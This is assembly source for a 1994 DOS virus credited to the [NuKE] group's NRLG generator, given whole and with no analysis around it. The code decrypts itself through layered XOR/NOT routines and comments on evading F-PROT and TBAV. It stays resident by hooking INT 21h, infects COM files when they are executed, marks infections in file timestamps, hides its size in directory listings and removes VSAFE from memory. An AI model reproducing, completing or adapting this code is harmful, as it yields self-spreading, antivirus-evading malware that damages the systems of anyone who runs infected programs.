;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS.        ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN  ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS                             ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR!                                 ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994                   ³ [NuKE] PoWeR

code    segment
assume cs:code,ds:code
org  100h

start:  CALL NEXT 
       mov di,sp             ;take the stack pointer location 
       mov bp,ss:[di]        ;take the "DELTA HANDLE" for my virus       
       sub bp,offset next    ;subtract the large code off this code 
;                      #1 DECRYPT ROUTINE                               

cmp byte ptr cs:[crypt],0b9h ;is the first runnig?        
je crypt2                    ;yes! not decrypt              
mov cx,offset fin            ;cx = large of virus               
lea di,[offset crypt]+ bp    ;di = first byte to decrypt          
mov dx,1                     ;dx = value for decrypt          
deci:                        ;deci = fuck label!                                    

ÿinc word ptr [di]
not byte ptr [di] 
sub word ptr [di],0bb4h
xor byte ptr [di],049h
xor word ptr [di],0e373h
sub word ptr [di],0ec3h
add word ptr [di],0e273h
add byte ptr [di],01h
inc word ptr [di]
xor byte ptr [di],02ah
xor word ptr [di],07ab0h
not word ptr [di] 
xor byte ptr [di],071h
not byte ptr [di] 
xor word ptr [di],0294ah
xor byte ptr [di],0ebh
ÿinc di
inc di
jmp bye                      ;######## BYE BYE F-PROT ! ##########     
mov ah,4ch
int 21h
bye:                         ;#### HEY FRIDRIK! IS ONLY A JMP!!###      
mov ah,0bh                   ;######### BYE BYE TBAV ! ##########     
int 21h                      ;### (CANGE INT AT YOU PLEASURE) ###        
loop deci                    ;repeat please!               
;                   #2 DECRYPT ROUTINE                                                    
crypt:                        ;fuck label!                  
mov cx,offset fin             ;cx = large of virus                 
lea di,[offset crypt2] + bp   ;di = first byte to decrypt                  
deci2:                        ;              
xor byte ptr cs:[di],1        ;decrytion rutine          
inc di                        ;very simple...            
loop deci2                    ;           
crypt2:                       ;fuck label!          
MOV AX,0CACAH                 ;call to my resident interrup mask                  
INT 21H                       ;for chek "I'm is residet?"   
CMP Bh,0CAH                   ;is equal to CACA?
JE PUM2                       ;yes! jump to runnig program
call action

ÿcall ANTI_V
;               PROCESS TO REMAIN RESIDENT                                                                  

mov   ax,3521h                  
int   21h                        ;store the int 21 vectors 
mov   word ptr [bp+int21],bx     ;in cs:int21
mov   word ptr [bp+int21+2],es   ;
push cs                          ; 
pop ax                           ;ax = my actual segment                             
dec ax                           ;dec my segment for look my MCB
mov es,ax                        ;
mov bx,es:[3]                    ;read the #3 byte of my MCB =total used memory
push cs                          ;   
pop es                           ;   
sub bx,(offset fin - offset start + 15)/16  ;subtract the large of my virus 
sub bx,17 + offset fin           ;and 100H for the PSP total
mov ah,4ah                       ;used memory
int 21h                          ;put the new value to MCB
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin     
mov ah,48h                      ;                              
int 21h                         ;request the memory to fuck DOS!                                                 
dec ax                          ;ax=new segment 
mov es,ax                       ;ax-1= new segment MCB 
mov byte ptr es:[1],8           ;put '8' in the segment
inc ax                          ; 
mov es,ax                       ;es = new segment
lea si,[bp + offset start]      ;si = start of virus 
mov di,100h                     ;di = 100H (psp position) 
mov cx,offset fin - start       ;cx = lag of virus
push cs                         ;
pop ds                          ;ds = cs
cld                             ;mov the code
rep movsb                       ;ds:si >> es:di
mov dx,offset virus             ;dx = new int21 handler
mov ax,2521h                    ;
push es                         ; 
pop ds                          ; 
int 21h                         ;set the vectors 
pum2:                               ;  
mov ah,byte ptr [cs:bp + real]      ;restore the 3  
mov byte ptr cs:[100h],ah           ;first bytes  
mov ax,word ptr [cs:bp + real + 1]  ;
mov word ptr cs:[101h],ax           ;
mov ax,100h                         ;
jmp ax                              ;jmp to execute
;*             HANDLER FOR THE INT 21H                                       
VIRUS:                    ;  
cmp ah,4bh                ;is a 4b function? 
je REPRODUCCION           ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
cmp AX,0CACAH             ;is ... a caca function? (resident chek)
jne a3                    ;no! jump to a3
mov bh,0cah               ;yes! put ca in bh
a3:                       ;
JMP dword ptr CS:[INT21]  ;jmp to original int 21h
ret                       ;    
make db '[NuKE] N.R.L.G. AZRAEL'
jmp dir_s
REPRODUCCION:              ;       
pushf                      ;put the register
pusha                      ;in the stack
push si                    ;
push di                    ;
push bp                    ;
push es                    ;
push ds                    ;
push cs                    ;  
pop ds                     ;  
mov ax,3524H               ;get the dos error control                      
int 21h                    ;interupt                        
mov word ptr error,es      ;and put in cs:error                      
mov word ptr error+2,bx    ;            
mov ax,2524H               ;change the dos error control                    
mov dx,offset all          ;for my "trap mask"                      
int 21h                    ;         
pop ds                     ;
pop es                     ;restore the registers
pop bp                     ;
pop di                     ;
pop si                     ;
popa                       ;
popf                       ;
pushf                      ;put the registers
pusha                      ;     
push si                    ;HEY! AZRAEL IS CRAZY?
push di                    ;PUSH, POP, PUSH, POP
push bp                    ;PLEEEEEAAAAAASEEEEEEEEE
push es                    ;PURIFY THIS SHIT!
push ds                    ;
mov ax,4300h                 ;       
int 21h                      ;get the file     
mov word ptr cs:[attrib],cx  ;atributes   
mov ax,4301h                 ;le saco los atributos al        
xor cx,cx                    ;file 
int 21h                      ;
mov ax,3d02h                 ;open the file 
int 21h                      ;for read/write
mov bx,ax                    ;bx=handle
mov ax,5700h                ;     
int 21h                     ;get the file date  
mov word ptr cs:[hora],cx   ;put the hour    
mov word ptr cs:[dia],dx    ;put the day    
and cx,word ptr cs:[fecha]  ;calculate the seconds    
cmp cx,word ptr cs:[fecha]  ;is ecual to 58? (DEDICATE TO N-POX)    
jne seguir                  ;yes! the file is infected!     
jmp cerrar                  ;
seguir:                     ;     
mov ax,4202h                ;move the pointer to end
call movedor                ;of the file
push cs                     ;   
pop ds                      ; 
sub ax,3                    ;calculate the 
mov word ptr [cs:largo],ax  ;jmp long
mov ax,04200h               ;move the pointer to  
call movedor                ;start of file
push cs                     ;   
pop ds                      ;read the 3 first bytes  
mov ah,3fh                  ;                           
mov cx,3                    ;
lea dx,[cs:real]            ;put the bytes in cs:[real]
int 21h                     ;
cmp word ptr cs:[real],05a4dh   ;the 2 first bytes = 'MZ' ?
jne er1                         ;yes! is a EXE... fuckkk!
jmp cerrar
mov ax,4200h      ;move the pointer                               
call movedor      ;to start fo file
push cs           ;       
pop ds            ; 
mov ah,40h        ;  
mov cx,1          ;write the JMP
lea dx,[cs:jump]  ;instruccion in the
int 21h           ;fist byte of the file
mov ah,40h         ;write the value of jmp
mov cx,2           ;in the file 
lea dx,[cs:largo]  ; 
int 21h            ;
mov ax,04202h      ;move the pointer to 
call movedor       ;end of file
push cs                     ;        
pop ds                      ;move the code  
push cs                     ;of my virus      
pop es                      ;to cs:end+50     
cld                         ;for encrypt          
mov si,100h                 ;    
mov di,offset fin + 50      ;      
mov cx,offset fin - 100h    ;        
rep movsb                   ;      
mov cx,offset fin           
mov di,offset fin + 50 + (offset crypt2 - offset start)  ;virus         
enc:                              ;           
xor byte ptr cs:[di],1            ;encrypt the virus              
inc di                            ;code                   
loop enc                          ;              
mov cx,offset fin           
mov di,offset fin + 50 + (offset crypt - offset start)  ;virus         
mov dx,1
enc2:                              ;           

ÿxor byte ptr [di],0ebh
xor word ptr [di],0294ah
not byte ptr [di]
xor byte ptr [di],071h
not word ptr [di]
xor word ptr [di],07ab0h
xor byte ptr [di],02ah
dec word ptr [di]
sub byte ptr [di],01h
sub word ptr [di],0e273h
add word ptr [di],0ec3h
xor word ptr [di],0e373h
xor byte ptr [di],049h
add word ptr [di],0bb4h
not byte ptr [di]
dec word ptr [di]
ÿinc di
inc di                             ;the virus code                  
loop enc2                          ;              
mov ah,40h                       ;  
mov cx,offset fin - offset start ;copy the virus              
mov dx,offset fin + 50           ;to end of file
int 21h                          ;
cerrar:                          ;
                                 ;restore the       
mov ax,5701h                     ;date and time    
mov cx,word ptr cs:[hora]        ;file   
mov dx,word ptr cs:[dia]         ;     
or cx,word ptr cs:[fecha]        ;and mark the seconds  
int 21h                          ; 
mov ah,3eh                       ; 
int 21h                          ;close the file
pop ds                           ;
pop es                           ;restore the 
pop bp                           ;registers
pop di                           ; 
pop si                           ;
popa                             ;
popf                             ;
pusha                           ;   
mov ax,4301h                    ;restores the atributes 
mov cx,word ptr cs:[attrib]     ;of the file  
int 21h                         ;   
popa                            ; 
pushf                           ;                           
pusha                           ; 8-(  = f-prot                       
push si                         ;                       
push di                         ; 8-(  = tbav   
push bp                         ;                       
push es                         ; 8-)  = I'm                        
push ds                         ;                              
mov ax,2524H                    ;                         
lea bx,error                    ;restore the                         
mov ds,bx                       ;errors handler      
lea bx,error+2                  ;                         
int 21h                         ;                       
pop ds                          ;
pop es                          ;
pop bp                          ;restore the 
pop di                          ;resgisters
pop si                          ;
popa                            ;
popf                            ;
JMP A3                          ;jmp to orig. INT 21
movedor:                        ;   
xor cx,cx                       ;use to move file pointer         
xor dx,dx                       ;       
int 21h                         ;        
ret                             ;        
all:                            ;  
XOR AL,AL                       ;use to set 
iret                            ;error flag

;         DATA AREA
largo  dw  ?
jump   db  0e9h
real   db  0cdh,20h,0
hora   dw  ?
dia    dw  ?
attrib dw  ?
int21  dd  ?
error  dd  ?

action:                 ;Nothing Action!    
NOP                     ;only replicate  
ret                     ;Return to call 

ANTI_V:                          ; 
MOV AX,0FA01H                    ;REMOVE VSAFE FROM MEMORY        
MOV DX,5945H                     ; 
INT 21H                          ;           
ret                              ;

             push    cs                                                    
             call    a3                      ;Get file Stats                       
             test    al,al                   ;Good FCB?                            
             jnz     no_good                 ;nope                                 
             push    ax                                                 
             push    bx                                                    
             push    es                                                    
             mov     ah,51h                  ;Is this Undocmented? huh...          
             int     21h                                                   
             mov     es,bx                                                 
             cmp     bx,es:[16h]                                           
             jnz     not_infected                        
             mov     bx,dx                                                 
             mov     al,[bx]                                               
             push    ax                                                    
             mov     ah,2fh                   ;Get file DTA                         
             int     21h                                                   
             pop     ax                                                    
             inc     al                                                    
             jnz     fcb_okay                                              
             add     bx,7h                                                 
fcb_okay:    mov     ax,es:[bx+17h]                                   
             and     ax,1fh                   ;UnMask Seconds Field                 
             xor     al,byte ptr cs:fechad                                      
             jnz     not_infected                                            
             and     byte ptr es:[bx+17h],0e0h                            
             sub     es:[bx+1dh],OFFSET FIN - OFFSET START  ;Yes minus virus size       
             sbb     es:[bx+1fh],ax                                        
not_infected:pop     es                                                    
             pop     bx                                                    
             pop     ax                                                    
no_good:     iret                                                          

ÿaction_dia Db 014H ;day for the action
action_mes Db 02H ;month for the action
FECHA DW 01eH ;Secon for mark
FECHAd Db 01eH ;Secon for mark dir st
code ends
end start